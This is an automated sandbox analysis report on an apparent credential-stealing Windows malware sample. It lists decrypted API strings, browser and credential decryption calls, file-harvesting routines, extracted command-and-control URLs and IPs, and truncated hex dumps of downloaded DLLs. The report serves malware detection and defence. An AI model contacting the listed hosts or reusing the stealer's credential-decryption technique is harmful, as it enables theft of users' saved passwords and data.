Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: wsprintfW
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RegQueryValueExA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RegEnumKeyExA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RegOpenKeyExA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RegCloseKey
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RegEnumValueA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CryptBinaryToStringA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CryptUnprotectData
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SHGetFolderPathA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ShellExecuteExA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: InternetOpenUrlA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: InternetConnectA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: InternetCloseHandle
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: InternetOpenA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: HttpSendRequestA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: HttpOpenRequestA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: InternetReadFile
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: InternetCrackUrlA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: StrCmpCA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: StrStrA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: StrCmpCW
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 0_2_00409BB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 0_2_00418940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040C660 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 0_2_0040C660
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00407280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00407280
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00409B10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C6E6C80

Compliance

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Unpacked PE file: 21.2.9fa327eb6c.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Unpacked PE file: 25.2.9fa327eb6c.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Unpacked PE file: 34.2.9fa327eb6c.exe.400000.0.unpack
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49848 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49852 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2521033172.000000006C74D000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2521346401.000000006C90F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2521346401.000000006C90F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2521033172.000000006C74D000.00000002.00000001.01000000.00000008.sdmp
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_004139B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040E270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00401710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004143F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 0_2_00414050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_004133C0
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: firefox.exe Memory has grown: Private usage: 1MB later: 221MB

Networking

Source: Malware configuration extractor URLs: http://85.28.47.31/5499d72b3a3e55be.php
Source: Malware configuration extractor URLs: http://85.28.47.31silence
Source: Malware configuration extractor IPs: 185.215.113.19
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 10:01:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 10:01:13 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 10:01:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 
73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 10:01:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 10:01:15 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 
72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 10:01:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 10:01:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 